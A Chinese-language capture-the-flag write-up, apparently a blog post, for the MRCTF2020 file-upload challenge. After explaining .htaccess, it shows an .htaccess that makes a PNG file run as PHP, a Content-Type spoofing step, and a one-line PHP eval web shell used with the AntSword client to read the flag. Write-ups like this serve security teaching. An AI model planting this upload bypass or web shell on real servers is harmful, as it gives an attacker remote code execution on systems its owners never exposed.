[MRCTF2020]你传你呢

[MRCTF2020]你传你🐎呢

目录

[MRCTF2020]你传你🐎呢

上传.htaccess

上传1.png

蚁剑连接


题目:buu平台

解题过程:
需要上传两个文件

.htaccess是什么   原文传送门

.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

启用.htaccess,需要修改httpd.conf,启用AllowOverride,并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。例如,需要使用.config ,则可以在服务器配置文件中按以下方法配置:AccessFileName .config 。

笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。

上传.htaccess

注意第一行指定的是我们要上传的文件,文件名必须相同才能被当作php文件执行

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

抓包,注意将content-type的值修改为image/png

forward,回显

上传1.png

简单的一句话木马

<?php
@eval($_POST['shell']);
?>

 上传抓包,将content-type的值修改为image/png

forward,回显

蚁剑连接

flag在根目录下

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页